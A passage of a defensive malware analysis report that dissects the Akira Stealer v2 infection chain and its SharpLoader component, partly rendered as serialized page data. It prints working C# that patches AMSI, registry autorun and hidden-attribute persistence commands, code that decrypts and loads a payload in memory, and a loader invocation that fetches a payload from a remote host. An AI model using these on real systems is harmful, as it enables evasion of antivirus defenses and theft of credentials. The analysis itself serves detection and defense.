In this case, `Updater.exe` served precisely that purpose: a quiet initial foothold designed to blend in, remain undetected, and pave the way for the execution of the actual stealer logic in `main.exe` and eventually `astor.py`.

It didn’t touch the file system beyond its own directory and didn’t trigger any behavioral rules — and yet, it was the first domino in a long and carefully constructed attack chain.

### 2.1.3 `main.exe` – Obfuscated NodeJS Payload Container

Following the execution of `Updater.exe`, a second-stage binary named `main.exe` was launched. This component presented itself as a standard Electron application — a runtime environment bundling Node.js and Chromium, often used for cross-platform desktop apps. Its innocuous nature is part of what makes it so dangerous in the wrong hands.

Upon inspection, `main.exe` contained an internal archive named `app.asar` — the standard packaging format for Electron-based applications. Unlike legitimate Electron apps, however, the contents of this archive were anything but ordinary.

- **Platform**: Electron (Node.js + Chromium)
- **Architecture**: 64-bit Windows
- **Content Structure**: Embedded JavaScript files within `app.asar`
- **Obfuscation Level**: High — achieved through `js-confuser`, a commercially available obfuscation toolkit for JavaScript

Once decompiled and deobfuscated, the core logic of `main.exe` became evident. Its purpose was not to present a GUI or execute any frontend logic — instead, it acted as a hidden execution orchestrator.

**Observed Behavior:**

- Decrypts and reconstructs a Base64-encoded PowerShell command stored within the JavaScript payload
- Spawns `cmd.exe` to execute the PowerShell command inline
- The PowerShell command in turn invokes `python.exe`, passing in a script located under a seemingly benign directory structure (`Crypto\Util\astor.py`)

```
main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\Util\astor.py
```

This chaining allowed the attacker to shift execution contexts and evade straightforward detection. Because the payload was obfuscated and staged in-memory, traditional signature-based controls were ineffective.

The Electron framework provided an ideal cover — allowing execution of arbitrary JavaScript while avoiding scrutiny. JavaScript-based execution also introduced cross-platform compatibility, allowing for flexible deployment and easier integration of dynamic control logic.

What made `main.exe` particularly dangerous was its ability to operate without dropping any additional files beyond what had already been staged. The stealer script was invoked directly from disk, but all staging and execution logic remained embedded within the Electron bundle.

In summary, `main.exe` served as the obfuscated, multi-layered execution core — acting as the gatekeeper between initial persistence and the full activation of the Akira Stealer payload in `astor.py`.

### 2.1.4 `cmd.exe` & PowerShell Relay

This stage of the execution chain functioned as a relay — not for payload logic, but for obfuscation and indirection.

After `main.exe` completed its role of unpacking and decoding the payload, it spawned a `cmd.exe` process. This process did not contain any malicious logic itself, nor did it write or modify files. Its sole purpose was to serve as a wrapper for launching a PowerShell session with an **encoded command**.

This method is a well-known tactic used to reduce visibility and avoid detection:

- **Execution Chain**:

  ```
  main.exe → cmd.exe /d /s /c "powershell -EncodedCommand <Base64Payload>"
  ```

- **Purpose**:
  - Encapsulates PowerShell execution within an additional shell
  - Hides the actual PowerShell code from direct visibility in logs
  - Evades EDRs that trigger on direct `powershell.exe` usage with suspicious parameters

By embedding the PowerShell script as a Base64-encoded string and invoking it through `cmd.exe`, the attacker avoided multiple forms of detection:

- **Command-line heuristic filters**
- **Standard logging (e.g., Event ID 4104, 4688)**
- **Rule-based detections for `powershell.exe` arguments like `-NoProfile`, `-ExecutionPolicy Bypass`, or inline scripts**

Notably, the PowerShell command was kept minimal and solely focused on launching `python.exe` with a path to the embedded stealer script — `astor.py`. No additional modules were loaded, and no obvious signatures were present in memory.

This relay technique is often used in red teaming and by sophisticated infostealers alike — serving as a lightweight evasion layer that’s easy to implement but hard to catch without telemetry correlation.

In this case, `cmd.exe` served exactly that purpose: a simple, silent bridge between JavaScript logic and Python execution — one that almost slipped through unnoticed.

### 2.1.5 `python.exe` with `astor.py`

The final and most impactful stage of the execution chain was reached when `python.exe` invoked `astor.py` — a Python-based, modular infostealer operating entirely in memory. This script represented the operational core of the entire attack chain.

Unlike many commodity stealers, `astor.py` was not deployed in plaintext. It was protected by a multi-layered decryption mechanism:

- **Decryption Stack**: The file was first GZIP-compressed and then encrypted using **AES-256-CBC**.
- **Key Derivation**: A PBKDF2-based key derivation process was used (SHA-512, 1,000,000 iterations), making static analysis and brute-forcing highly impractical.

Once decrypted at runtime, the script executed several specialized modules, all targeting sensitive data sources:

**Core Capabilities**

- **Browser Data Extraction**: Retrieved login credentials, cookies, and autofill data from Chromium-based browsers (Chrome, Edge, Brave, Opera)
- **Token Harvesting**: Collected session tokens, particularly from **Discord**, and scanned for cryptocurrency wallet extensions
- **Data Packaging**: Aggregated all harvested data into a structured **ZIP archive**, preserving directory and file context for attacker-side parsing
- **Exfiltration**: Uploaded the resulting archive to public APIs and infrastructure.

**Execution Context**

The entire stealer logic executed from memory, with no persistent files written to disk. It left minimal telemetry traces beyond in-process memory artifacts and standard subprocess invocation. No attempt was made to establish persistence at this stage — the goal was quick, efficient, and silent data theft.

The use of legitimate APIs for exfiltration also made detection and prevention significantly harder, as outbound traffic blended in with routine internet activity.

This stage ultimately confirmed the malware’s identity: a variant of **Akira Stealer v2**, known for its:

- High modularity
- Runtime obfuscation
- Commercial distribution via Telegram
- Strong focus on credential harvesting and token-based session hijacking

Together with the earlier stages, `astor.py` formed the critical endpoint of a stealthy and well-engineered infostealer chain. In the following sections, we dissect this component further and explain how we reversed its logic, mapped its infrastructure, and recovered every indicator of compromise used during its operation.

# 3. Deep Dive: `Updater.exe`

`Updater.exe` was the initial binary observed during post-compromise analysis. Despite its neutral appearance and negligible detection footprint, it played a critical role in maintaining the malware's operational persistence and delivering the next-stage payload.

## 3.1 Properties

- **Format:** Windows Portable Executable (PE32)
- **Architecture:** x86-64
- **Size:** ~154 KB
- **Entropy:** Normal (non-packed)
- **Signatures:**
- **VirusTotal Detection:** 1/69 at time of analysis

The file exhibited a clean import table and no embedded string indicators. No known packers, crypters, or runtime obfuscation mechanisms were detected. The structure was consistent with custom-compiled binaries.

## 3.2 Behavioral Analysis

**No User Interaction Required**

The malware chain executed without any required user interaction. Based on Defender’s process telemetry, the initial binary (`Updater.exe`) was launched automatically — most likely via a persistence mechanism such as a registry autorun key. However, due to the age of the compromise and the absence of historical event logs, the exact method of persistence could not be recovered.

**Silent Execution and Staging**

Upon execution, `Updater.exe` immediately launched `main.exe` with no visual window and no user prompts. The staging occurred silently in the background. There was no evidence of user consent dialogs, UAC prompts, or GUI components.

**Payload Deployment Behavior**

`main.exe` was found to be part of an Electron application structure, but the exact origin of its deployment remains unclear. One of the following is assumed:

- The payload may have been bundled internally within `Updater.exe` (e.g., embedded resource), or
- It may have been retrieved from a remote source

Due to a lack of network telemetry and no recovered hardcoded URL, the delivery vector for the Electron app remains inconclusive.

**Process Chain Behavior**

Once executed, `Updater.exe` spawned `main.exe` as a child process. The invocation was non-interactive, and no process spawned from the chain exhibited UI activity. The process chain continued as expected:

```
Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py
```

All execution stages operated without requiring user input, relying solely on pre-configured launch logic and silent execution paths.
This minimized exposure and helped the malware remain undetected over an extended period.",[41,9244,9246],{"id":9245},"_33-role-in-the-infection-chain","3.3 Role in the Infection Chain",[12,9248,47],{},[12,9250,9251,9253,9254,9257,9258,1013],{},[63,9252,8296],{}," played a ",[251,9255,9256],{},"single but essential role"," within the broader infection chain: it was responsible for the persistence and redeployment of the stage-2 component — ",[63,9259,8300],{},[12,9261,9262],{},[251,9263,9264],{},"Confirmed Characteristics",[1254,9266,9267,9274,9279],{},[1257,9268,9269,9270,9273],{},"It ",[251,9271,9272],{},"did not"," contain or execute malicious logic directly",[1257,9275,9269,9276,9278],{},[251,9277,9272],{}," perform any data exfiltration",[1257,9280,9269,9281,9283],{},[251,9282,9272],{}," interact with browser credential stores or sensitive user data",[12,9285,9286,9287,9289],{},"Its sole purpose was to silently launch ",[63,9288,8300],{}," during user login, using a registry autorun entry as the most likely method of persistence (though not directly recovered due to telemetry limitations).",[12,9291,9292,9293,9295,9296,9298],{},"By acting as an isolated first-stage loader, ",[63,9294,8296],{}," ensured that the actual stealer payload (",[63,9297,8304],{},") remained concealed in deeper layers of execution. 
This separation of duties allowed the attackers to:",[1254,9300,9301,9304,9307],{},[1257,9302,9303],{},"Avoid correlation by static AV or sandbox systems",[1257,9305,9306],{},"Swap or update payloads without modifying the loader",[1257,9308,9309],{},"Reduce behavioral signals at the entry point",[12,9311,9312,9313,9316],{},"This pattern is typical in ",[251,9314,9315],{},"malware-as-a-service (MaaS)"," operations, where delivery mechanisms are generic and payloads are modular or client-specific.",[12,9318,8711,9319,9321],{},[63,9320,8296],{}," provided just enough logic to serve as a reliable and stealthy entry point — nothing more, but also nothing less.",[41,9323,9325],{"id":9324},"_34-persistence-via-registry-confirmed-in-astorpy","3.4 Persistence via Registry (Confirmed in astor.py)",[12,9327,47],{},[12,9329,9330,9331,9333],{},"Static analysis of the Python payload revealed that ",[63,9332,8296],{}," is explicitly persisted using a registry autorun entry:",[1254,9335,9336,9344,9352],{},[1257,9337,9338,1061,9341],{},[251,9339,9340],{},"Registry Path",[63,9342,9343],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[1257,9345,9346,1061,9349],{},[251,9347,9348],{},"Value Name",[63,9350,9351],{},"Realtek Audio",[1257,9353,9354,1061,9357],{},[251,9355,9356],{},"Payload Path",[63,9358,9359],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[12,9361,9362],{},"The corresponding registry command is executed via PowerShell:",[56,9364,9368],{"className":9365,"code":9366,"language":9367,"meta":65,"style":65},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[63,9369,9370],{"__ignoreMap":65},[102,9371,9372],{"class":104,"line":105},[102,9373,9366],{},[12,9375,9376],{},"This ensures the malware is launched at every user login. 
The file is also marked with hidden and system attributes to further evade detection:",[56,9378,9380],{"className":9365,"code":9379,"language":9367,"meta":65,"style":65},"attrib +h +s \"Updater.exe\"\n",[63,9381,9382],{"__ignoreMap":65},[102,9383,9384],{"class":104,"line":105},[102,9385,9379],{},[12,9387,9388],{},"This persistence mechanism was embedded directly into the astor.py code, confirming that the final-stage stealer actively maintains loader presence on disk and in the startup registry.",[41,9390,9392],{"id":9391},"_35-summary","3.5 Summary",[12,9394,47],{},[2110,9396,9397],{},[12,9398,9399,9400,9402],{},"While ",[63,9401,8296],{}," was not inherently malicious in structure or content, its contextual behavior within the execution chain confirmed its role as a malware loader.",[52,9404],{"className":9405},[8535],[12,9407,9408],{},"This binary served as a clean, minimalistic first-stage launcher — avoiding detection by static analysis, AV engines, and behavioral rules. Its design focused purely on stealth and operational support, not on executing malicious logic itself.",[12,9410,9411,9412,9414,9415,9417,9418,9421],{},"However, its role extended beyond initial deployment. During reverse engineering of the ",[63,9413,8304],{}," payload, we identified logic that actively checked for the presence of ",[63,9416,8296],{},". This check was part of a broader ",[251,9419,9420],{},"health and self-healing cycle"," implemented within the stealer code — a mechanism designed to verify the integrity of the infection chain and restore missing components if needed.",[12,9423,9424,9425,9427,9428,9431],{},"This means that ",[63,9426,8296],{}," was not only responsible for initiating the malware, but also formed part of its ",[251,9429,9430],{},"ongoing runtime validation",". 
Without this stub, the malware could lose its ability to reinitialize in future sessions.",[12,9433,9434],{},[251,9435,9436,9437,1550],{},"Key Functions of ",[63,9438,8296],{},[1254,9440,9441,9446,9451,9454],{},[1257,9442,9443,9444],{},"Seamless deployment of ",[63,9445,8300],{},[1257,9447,9448,9449],{},"Indirect execution of ",[63,9450,8304],{},[1257,9452,9453],{},"Decoupling of loader and payload logic",[1257,9455,9456,9459],{},[251,9457,9458],{},"Referenced by the payload itself"," as part of operational health monitoring",[12,9461,9462],{},"In Section 5, we will detail the internal health-check routines of the stealer, including its self-healing behavior and integrity validation mechanisms.",[12,9464,9465,9466,9468],{},"For now, it is clear that ",[63,9467,8296],{}," served as both ignition and anchor point in this layered infostealer architecture.",[41,9470,9472],{"id":9471},"_36-extraction-trick-outsmarting-the-loader","3.6 Extraction Trick: Outsmarting the Loader",[12,9474,47],{},[12,9476,9477],{},"Sometimes, the best reverse engineering results don’t come from deep binary disassembly — but from a bit of trickery and patience.",[12,9479,9480,9481,9483,9484,9486],{},"While analyzing the infection in a controlled lab environment, we noticed something odd: ",[63,9482,8296],{}," was present and executing, but ",[63,9485,8300],{}," had vanished from the file system. That’s when we had an idea — what happens if we let the malware repair itself?",[12,9488,9489,9490,9495,9496,9498],{},"We deliberately ",[251,9491,9492,9493],{},"deleted ",[63,9494,8300],{}," from the infected environment while leaving ",[63,9497,8296],{}," untouched. 
And sure enough, after the next user session login, the loader sprang into action — not with a tantrum, but with a quiet attempt to rebuild its second stage.",[12,9500,9501,9502,805,9504,9506,9507,9510,9511,9514,9515,805,9517,9520,9521,9523],{},"Here’s where it got interesting: Instead of directly recreating ",[63,9503,8300],{},[63,9505,8296],{}," first dropped a file named ",[63,9508,9509],{},"app-64.7z"," — a standard ",[251,9512,9513],{},"7-Zip archive",". This archive contained the full Electron application structure, including ",[63,9516,8300],{},[63,9518,9519],{},"resources",", and the ",[63,9522,8749],{}," payload with all embedded logic.",[12,9525,9526,9527,1013],{},"We had effectively ",[251,9528,9529],{},"forced the malware to hand us the source package",[12,9531,9532],{},[2642,9533],{"alt":9534,"src":9535},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[12,9537,9538],{},"With this 7z archive in hand, we were able to extract, decompress, and fully reverse the JavaScript-based orchestration logic without even touching the original loader again. The archive structure matched the expected Electron app layout perfectly.",[12,9540,9541,9542,9545],{},"This behavior strongly suggests that the attackers deliberately chose a ",[251,9543,9544],{},"modular and maintainable architecture",", using archives as flexible payload containers. It also allowed them to swap or update payload components without recompiling the loader binary.",[12,9547,9548],{},"And in our case? 
It allowed us to outsmart their chain, intercept the drop, and walk away with the full package — like stealing the blueprints off the workbench while the builder wasn’t looking.",[12,9550,9551,9552],{},"Let’s just say: ",[251,9553,9554,9555,805,9558,9561],{},"sometimes the best forensic tools are ",[63,9556,9557],{},"del",[63,9559,9560],{},"wait",", and a little curiosity.",[25,9563,9565,9566],{"id":9564},"_4-deep-dive-powbat","4. Deep Dive: ",[63,9567,9568],{},"pow.bat",[12,9570,31],{},[12,9572,9573,9574,9577],{},"In the analyzed malware campaign, the component ",[63,9575,9576],{},"Invoke-SharpLoader"," acts as a custom, memory-resident .NET loader that exhibits a highly modular and evasive execution flow. This section dissects its internal architecture, its anti-analysis strategy via AMSI patching, and its role in facilitating the second stage payload.",[41,9579,9581],{"id":9580},"_41-binary-properties-sharploader-batch-wrapper","4.1 Binary Properties – SharpLoader Batch Wrapper",[12,9583,47],{},[12,9585,9586,9587,9589],{},"Before being executed to load the .NET payload in memory, the outer wrapper ",[63,9588,9568],{}," shows the following characteristics based on static analysis:",[417,9591,9592,9600],{},[422,9593,9594],{},[426,9595,9596,9598],{},[430,9597,433],{},[430,9599,436],{},[438,9601,9602,9611,9620,9630,9639,9649,9659,9668],{},[426,9603,9604,9608],{},[443,9605,9606],{},[251,9607,9109],{},[443,9609,9610],{},"DOS Batch File",[426,9612,9613,9617],{},[443,9614,9615],{},[251,9616,9119],{},[443,9618,9619],{},"Script-based (not compiled binary)",[426,9621,9622,9627],{},[443,9623,9624],{},[251,9625,9626],{},"File Size:",[443,9628,9629],{},"27.79 KB (28454 bytes)",[426,9631,9632,9636],{},[443,9633,9634],{},[251,9635,9139],{},[443,9637,9638],{},"Normal (plain ASCII text)",[426,9640,9641,9646],{},[443,9642,9643],{},[251,9644,9645],{},"Magic:",[443,9647,9648],{},"DOS batch file, ASCII text",[426,9650,9651,9656],{},[443,9652,9653],{},[251,9654,9655],{},"Digital 
Signature:",[443,9657,9658],{},"None detected",[426,9660,9661,9665],{},[443,9662,9663],{},[251,9664,9158],{},[443,9666,9667],{},"26 / 61 (at time of analysis)",[426,9669,9670,9675],{},[443,9671,9672],{},[251,9673,9674],{},"Threat Labels:",[443,9676,9677,805,9680,805,9683,805,9685],{},[63,9678,9679],{},"trojan",[63,9681,9682],{},"downloader",[63,9684,9367],{},[63,9686,9687],{},"agentb",[12,9689,9690,9691,9694],{},"Despite being a simple ",[63,9692,9693],{},".bat"," file, the script evades many static detections and relies heavily on living-off-the-land techniques such as PowerShell to download and execute obfuscated and encrypted payloads.",[41,9696,9698,9699,1288],{"id":9697},"_42-amsi-bypass-technique-class-gofor4msi","4.2 AMSI Bypass Technique (Class: ",[63,9700,9701],{},"gofor4msi",[12,9703,47],{},[12,9705,9706],{},"One of the first defensive mechanisms bypassed by SharpLoader is AMSI — the Anti-Malware Scan Interface — a Microsoft feature integrated into scripting engines like PowerShell and Windows Script Host to provide real-time content scanning for suspicious behavior. Malware authors often attempt to bypass AMSI to avoid detection by endpoint protection systems.",[12,9708,9709,9710,9713,9714,9717,9718,9721,9722,9725,9726,7224],{},"In SharpLoader, the AMSI bypass is implemented through ",[251,9711,9712],{},"direct in-memory patching"," of the ",[63,9715,9716],{},"AmsiScanBuffer"," function within the ",[63,9719,9720],{},"amsi.dll",". 
This function is normally responsible for analyzing script content and returning a result code indicating whether the content is suspicious (",[63,9723,9724],{},"AMSI_RESULT_DETECTED",") or safe (",[63,9727,9728],{},"AMSI_RESULT_CLEAN",[12,9730,9731],{},"The relevant in-memory patching code is:",[56,9733,9737],{"className":9734,"code":9735,"language":9736,"meta":65,"style":65},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[63,9738,9739,9744,9749,9754],{"__ignoreMap":65},[102,9740,9741],{"class":104,"line":105},[102,9742,9743],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[102,9745,9746],{"class":104,"line":111},[102,9747,9748],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[102,9750,9751],{"class":104,"line":329},[102,9752,9753],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[102,9755,9756],{"class":104,"line":346},[102,9757,9758],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[12,9760,9761],{},"This sequence performs the following steps:",[3259,9763,9764,9773,9784,9794],{},[1257,9765,9766,9769,9770,1013],{},[251,9767,9768],{},"Load the AMSI DLL"," into the process using ",[63,9771,9772],{},"LoadLibrary(\"amsi.dll\")",[1257,9774,9775,9778,9779,8305,9781,1013],{},[251,9776,9777],{},"Resolve the memory address"," of the function ",[63,9780,9716],{},[63,9782,9783],{},"GetProcAddress()",[1257,9785,9786,9789,9790,9793],{},[251,9787,9788],{},"Change the memory protection"," of the address using ",[63,9791,9792],{},"VirtualProtect()"," to make it writable.",[1257,9795,9796,9799,9800,9803],{},[251,9797,9798],{},"Overwrite the beginning of the function"," using ",[63,9801,9802],{},"Marshal.Copy()"," with a small shellcode patch.",[12,9805,9806],{},"The patch applied for 
64-bit systems is:",[56,9808,9810],{"className":9734,"code":9809,"language":9736,"meta":65,"style":65},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[63,9811,9812],{"__ignoreMap":65},[102,9813,9814],{"class":104,"line":105},[102,9815,9809],{},[12,9817,9818],{},"This corresponds to the following instructions:",[1254,9820,9821,9830],{},[1257,9822,9823,9826,9827],{},[63,9824,9825],{},"mov eax, 0x80070057"," → sets the return code to the Windows error code ",[63,9828,9829],{},"E_INVALIDARG",[1257,9831,9832,9835],{},[63,9833,9834],{},"ret"," → immediately returns from the function",[12,9837,9838,9839,9841],{},"This effectively causes ",[63,9840,9716],{}," to fail silently and return a non-detection result, neutralizing AMSI checks. The malware can now execute scripts or .NET code that would otherwise trigger antivirus alerts.",[12,9843,9844],{},"If executed on a 32-bit system, a different patch is applied:",[56,9846,9848],{"className":9734,"code":9847,"language":9736,"meta":65,"style":65},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[63,9849,9850],{"__ignoreMap":65},[102,9851,9852],{"class":104,"line":105},[102,9853,9847],{},[12,9855,9856],{},"This reflects the same goal — forcing a \"clean\" result — but adapted to the x86 calling convention.",[12,9858,9859,9860,805,9863,9866,9867,9870],{},"Using raw P/Invoke calls like ",[63,9861,9862],{},"LoadLibrary",[63,9864,9865],{},"GetProcAddress",", and ",[63,9868,9869],{},"VirtualProtect"," allows this patching to be done dynamically and without invoking any high-level APIs that might be monitored by EDR tools. This method is compact, effective, and leaves minimal forensic artifacts.",[12,9872,9873,9874,9877],{},"In summary, this AMSI bypass technique is a ",[251,9875,9876],{},"low-level, direct memory attack on the antivirus interface",", carried out in milliseconds during runtime. 
It's a powerful example of why behavioral monitoring and memory inspection are essential in modern endpoint defense systems.",[41,9879,9881],{"id":9880},"_43-stage-2-payload-handling","4.3 Stage 2 Payload Handling",[12,9883,47],{},[12,9885,9886,9887,9890],{},"After the AMSI bypass is complete, the loader proceeds to retrieve and prepare the second-stage payload. This payload is not embedded in the loader itself but is fetched either from a remote server or read from disk — depending on how the loader is invoked via the ",[63,9888,9889],{},"$location"," parameter.",[12,9892,9893,9894,9897,9898,9901,9902,9905,9906,9909,9910,9913],{},"If the location begins with ",[63,9895,9896],{},"http",", it is interpreted as a URL and the loader uses ",[63,9899,9900],{},"Get_Stage2()"," to download the payload via ",[63,9903,9904],{},"HttpWebRequest",". If it is a local path, ",[63,9907,9908],{},"Get_Stage2disk()"," reads the contents directly from the file system. In both cases, the expected file content is a ",[251,9911,9912],{},"Base64-encoded, GZip-compressed, and AES-encrypted"," blob.",[12,9915,9916,9917,9920],{},"The loader then performs a ",[251,9918,9919],{},"four-stage decoding and decryption pipeline"," entirely in memory:",[3259,9922,9923,9929,9939,9949],{},[1257,9924,9925,9928],{},[251,9926,9927],{},"Base64 Decoding",": Converts the encoded string into raw bytes. This step is designed to obscure the actual binary content from static inspection tools and prevents straightforward pattern matching.",[1257,9930,9931,9934,9935,9938],{},[251,9932,9933],{},"GZip Decompression",": The decoded bytes are passed to a ",[63,9936,9937],{},"GZipStream",", which decompresses the payload. Compression reduces file size and adds another layer of obfuscation.",[1257,9940,9941,9944,9945,9948],{},[251,9942,9943],{},"AES Decryption",": The compressed bytes are decrypted using AES (Rijndael) in CBC mode. 
The key is derived at runtime from the user-provided password using SHA-256 hashing combined with PBKDF2 (",[63,9946,9947],{},"Rfc2898DeriveBytes",") and a static salt.",[1257,9950,9951,9954],{},[251,9952,9953],{},"Salt Removal",": The decrypted result still contains a fixed-length salt prefix (4 bytes). These bytes are removed manually to obtain the clean binary blob that represents a valid .NET assembly.",[12,9956,9957],{},"The decryption pipeline is executed like so:",[56,9959,9961],{"className":9734,"code":9960,"language":9736,"meta":65,"style":65},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[63,9962,9963,9968],{"__ignoreMap":65},[102,9964,9965],{"class":104,"line":105},[102,9966,9967],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[102,9969,9970],{"class":104,"line":111},[102,9971,9972],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[12,9974,9975,9976,9979],{},"Here, ",[63,9977,9978],{},"AES_Decrypt()"," is a custom function that wraps the Rijndael algorithm, configured with a 256-bit key and a 128-bit IV (initialization vector), both derived from the password.",[12,9981,9982],{},[251,9983,9984],{},"Key Design Observations:",[1254,9986,9987,9990,9993],{},[1257,9988,9989],{},"The use of AES-CBC with PBKDF2 makes brute-forcing the password non-trivial.",[1257,9991,9992],{},"Since decryption happens in memory, no intermediate results are ever written to disk — reducing forensic artifacts.",[1257,9994,9995],{},"If the wrong password is supplied, decryption silently fails or produces invalid data, which may lead to failed execution or hard-to-trace exceptions.",[12,9997,9998],{},"In summary, this multi-stage payload handling approach significantly raises the bar for both signature- and heuristic-based static detection. 
Without either live execution or deep inspection of the loader behavior, defenders are unlikely to uncover the embedded payload without also knowing the password and exact decoding logic.",[41,10000,10002],{"id":10001},"_44-dynamic-assembly-loading","4.4 Dynamic Assembly Loading",[12,10004,47],{},[12,10006,10007],{},"Once the second-stage payload has been successfully decrypted, the resulting byte array represents a valid .NET assembly. Instead of writing this assembly to disk — a common indicator for antivirus or EDR systems — SharpLoader executes it directly in memory using reflection:",[56,10009,10011],{"className":9734,"code":10010,"language":9736,"meta":65,"style":65},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[63,10012,10013,10018],{"__ignoreMap":65},[102,10014,10015],{"class":104,"line":105},[102,10016,10017],{},"Assembly a = Assembly.Load(bin);\n",[102,10019,10020],{"class":104,"line":111},[102,10021,10022],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[12,10024,10025,10026,10029],{},"This technique is referred to as ",[251,10027,10028],{},"fileless execution",". 
It is highly evasive because it:",[1254,10031,10032,10035,10038],{},[1257,10033,10034],{},"Avoids touching the disk, leaving no file-based IOCs (indicators of compromise)",[1257,10036,10037],{},"Makes traditional forensic acquisition harder, as no binary is saved on disk",[1257,10039,10040],{},"Evades static signature-based detection, since AV engines often rely on scanning files",[12,10042,10043,10044,10047,10048,10051],{},"If the ",[63,10045,10046],{},"EntryPoint"," is not ",[63,10049,10050],{},"static",", the loader includes a fallback logic:",[56,10053,10055],{"className":9734,"code":10054,"language":9736,"meta":65,"style":65},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n    object o = a.CreateInstance(method.Name);\n    method.Invoke(o, null);\n}\n",[63,10056,10057,10062,10067,10072,10077,10082],{"__ignoreMap":65},[102,10058,10059],{"class":104,"line":105},[102,10060,10061],{},"MethodInfo method = a.EntryPoint;\n",[102,10063,10064],{"class":104,"line":111},[102,10065,10066],{},"if (method != null)\n",[102,10068,10069],{"class":104,"line":329},[102,10070,10071],{},"{\n",[102,10073,10074],{"class":104,"line":346},[102,10075,10076],{},"    object o = a.CreateInstance(method.Name);\n",[102,10078,10079],{"class":104,"line":650},[102,10080,10081],{},"    method.Invoke(o, null);\n",[102,10083,10084],{"class":104,"line":656},[102,10085,10086],{},"}\n",[12,10088,10089,10090,10093],{},"This ensures compatibility with assemblies that require an instantiated object for execution (e.g., ",[63,10091,10092],{},"public int Main()"," inside a class instance). 
The code dynamically creates an instance of the class and then calls the entry point method.",[12,10095,10096],{},"Combined with the AMSI bypass and in-memory decryption, this mechanism delivers the final payload to execution in a stealthy, fully fileless manner — a hallmark of modern, evasive malware.",[41,10098,10100],{"id":10099},"_45-command-line-parameters-and-flexibility","4.5 Command Line Parameters and Flexibility",[12,10102,47],{},[12,10104,10105,10106,10108],{},"The PowerShell function ",[63,10107,9576],{}," is designed to act as a flexible wrapper for arbitrary .NET payloads. It supports dynamic input of both the payload location and arguments, allowing a single loader instance to be reused across multiple operations or campaigns.",[12,10110,10111],{},[251,10112,10113],{},"Supported Parameters:",[1254,10115,10116,10122,10128,10148],{},[1257,10117,10118,10121],{},[63,10119,10120],{},"-location"," (mandatory): Specifies either a URL or a local file path to the stage two encrypted payload.",[1257,10123,10124,10127],{},[63,10125,10126],{},"-password"," (mandatory): Used to derive the AES decryption key.",[1257,10129,10130,805,10133,805,10136,10139,10140,10143,10144,10147],{},[63,10131,10132],{},"-argument",[63,10134,10135],{},"-argument2",[63,10137,10138],{},"-argument3"," (optional): These are forwarded directly to the ",[63,10141,10142],{},".NET"," assembly’s ",[63,10145,10146],{},"Main()"," method via reflection.",[1257,10149,10150,10153],{},[63,10151,10152],{},"-noArgs",": Triggers execution without passing any parameters to the second-stage payload.",[12,10155,10156],{},"Internally, the arguments are collected and forwarded like this:",[56,10158,10160],{"className":9365,"code":10159,"language":9367,"meta":65,"style":65},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[63,10161,10162,10167],{"__ignoreMap":65},[102,10163,10164],{"class":104,"line":105},[102,10165,10166],{},"object[] cmd = 
args.Skip(2).ToArray();\n",[102,10168,10169],{"class":104,"line":111},[102,10170,10171],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[12,10173,10174],{},"This means that the .NET payload is expected to have a signature like:",[56,10176,10178],{"className":9734,"code":10177,"language":9736,"meta":65,"style":65},"static void Main(string[] args)\n",[63,10179,10180],{"__ignoreMap":65},[102,10181,10182],{"class":104,"line":105},[102,10183,10177],{},[12,10185,10186,10187,10189],{},"or it will gracefully fall back to the parameterless ",[63,10188,10146],{}," variant via fallback logic. This behavior allows red teams or malware authors to create multi-purpose second stages that can perform different operations depending on the input — for example, launching an implant, collecting system info, or initiating C2 communication.",[12,10191,10192],{},"Such modularity and configurability are key features of advanced malware frameworks, and they illustrate how script-based loaders can behave as highly adaptive execution environments for downstream payloads.",[41,10194,10196],{"id":10195},"_46-real-world-usage-example","4.6 Real-World Usage Example",[12,10198,47],{},[12,10200,10201],{},"To illustrate SharpLoader’s real-world execution in an actual campaign, consider the following invocation seen in the wild:",[56,10203,10205],{"className":9365,"code":10204,"language":9367,"meta":65,"style":65},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[63,10206,10207],{"__ignoreMap":65},[102,10208,10209],{"class":104,"line":105},[102,10210,10204],{},[12,10212,10213],{},"This example highlights the typical use case of SharpLoader:",[1254,10215,10216,10230,10242,10252],{},[1257,10217,10218,10221,10222,10225,10226,10229],{},[251,10219,10220],{},"Location Argument",": The URL points to a remote server hosting ",[63,10223,10224],{},"calc.enc",", a concealed second-stage payload. 
